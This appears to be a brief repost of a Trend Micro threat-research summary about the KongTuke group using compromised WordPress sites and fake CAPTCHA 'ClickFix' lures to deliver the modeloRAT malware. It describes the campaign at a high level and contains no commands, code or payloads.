Our analysis of an active KongTuke campaign deploying modeloRAT — malware capable of reconnaissance, command execution, and persistent access — through compromised WordPress sites and fake CAPTCHA lures shows that the group still operates this delivery chain in parallel with the newer CrashFix technique. The attack relies heavily on legitimate system tools and trusted services to avoid detection, using components such as PowerShell, finger.exe, Dropbox-hosted files, and portable Python environments. The malware can execute commands remotely, maintain persistence, and remain active on compromised systems while leaving minimal visible traces.
Through the Lens of MDR: Analysis of KongTuke’s ClickFix Abuse of Compromised WordPress Sites
Summary: Trend Micro Research details how the KongTuke threat group continues to use compromised WordPress sites and fake CAPTCHA lures to deploy modeloRAT, a multi-stage malware.
Key facts
- The KongTuke threat group continues to use compromised WordPress sites and fake CAPTCHA lures to deliver modeloRAT.
- modeloRAT is a multi-stage malware capable of reconnaissance, command execution, and persistent access.
- Attackers inject malicious JavaScript into legitimate WordPress websites, prompting users to run a PowerShell command that triggers a multistage infection process.
- While the attack relies on legitimate system tools and trusted services for evasion, it can execute commands remotely, maintain persistence, and remain active on compromised systems.
Why it matters
This campaign poses a significant threat to organizations whose users browse compromised websites or encounter prompts asking them to run commands. It highlights the ongoing sophistication of threat actors in using legitimate-looking methods to evade detection and gain persistent access to corporate networks.
@trendaisecurity
Embedded content for: Through the Lens of MDR: Analysis of KongTuke’s ClickFix Abuse of Compromised WordPress Sites